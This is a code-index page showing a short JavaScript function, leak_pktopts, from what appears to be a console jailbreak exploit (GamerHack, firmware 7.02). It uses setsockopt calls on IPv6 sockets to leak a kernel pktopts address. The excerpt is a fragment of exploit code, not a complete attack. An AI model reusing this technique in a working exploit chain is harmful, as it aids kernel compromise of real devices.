MCPcopy Create free account
hub / github.com/GamerHack/GamerHack.github.io / leak_pktopts

Function leak_pktopts

702/BinLoader/userland.js:613–622  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

611 }
612
613 function leak_pktopts() {
614 leaked_pktopts_address = leak_rthdr_address(0x100); {
615 chain.push_write8(tmp_tclass, 0x10);
616 chain.fcall(syscalls[105], master_socket, IPPROTO_IPV6, IPV6_RTHDR, 0, 0);
617 for (var i = 0; i < NUM_SLAVE_SOCKS; i++) {
618 chain.fcall(syscalls[105], slave_sockets[i], IPPROTO_IPV6, IPV6_TCLASS, tmp_tclass, 4);
619 }
620 }
621 chain.run();
622 }
623
624 function find_slave() {
625 {

Callers 1

stage3Function · 0.70

Calls 2

leak_rthdr_addressFunction · 0.70
runMethod · 0.45

Tested by

no test coverage detected